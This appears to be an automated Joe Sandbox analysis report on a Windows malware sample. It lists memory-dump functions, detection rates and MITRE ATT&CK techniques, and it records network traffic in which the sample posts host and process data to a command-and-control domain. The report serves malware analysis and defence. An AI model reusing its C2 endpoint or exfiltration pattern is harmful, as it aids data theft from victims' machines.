Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction ID: f83fac3427c50512508992c585db84c35048c2478c15119e0898ecef121e5a32
Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction Fuzzy Hash: 78F01C33A20B344B6360CD7A8D05597A2D797C86B0B1FC969ECA5E7206E930EC0656D5

Function 00866810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

[, xrefs: 008669E1

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 7614732984cf4036fa0907a1288b9abef8f6d545ee27bbc13aaa8f754f85e7eb
Instruction ID: 7d8227185c47a0717c1838237a06e8e25c43711554b61521d0ed0dbb4caffd44
Opcode Fuzzy Hash: 7614732984cf4036fa0907a1288b9abef8f6d545ee27bbc13aaa8f754f85e7eb
Instruction Fuzzy Hash: 39B166719083D5ABDB359A24C89173FBBD8FF55328F1A092DE8C6C6181FB25C8748392

Function 00B8B1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

islower.MSVCRT ref: 00B8B23A

Strings

$, xrefs: 00B8B1C4

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: islower
String ID: $
API String ID: 3326879001-3993045852
Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
Instruction ID: 72cabcd2208a88b1310398596b027e106fd61ce7b80a4d7f428608a0a443abcd
Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
Instruction Fuzzy Hash: 4C61C4706087458BC714AF78C880A2FFBE2AFC5314F588AADE4958B3B1E774D845DB46

Source: sYPORwmgwQ.exe	Virustotal: Detection: 45%			Perma Link
Source: sYPORwmgwQ.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [ebp+04h], 424D53FFh	0_2_0086A5B0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0086B560

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 444129Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 35 30 31 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 2
Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fiveth5ht.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sYPORwmgwQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
sYPORwmgwQ.exe

Function 0080255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282
fileCOMMON

Function 008029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 008105B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Function 008CB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 008C9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Function 00838B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269
networkCOMMON

Function 00802F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144
registryCOMMON

Function 00839290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 008076A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Function 00807770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 008075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 0083A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 0081D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Function 008CAA30 Relevance: 4.9, APIs: 3, Instructions: 377
networkCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre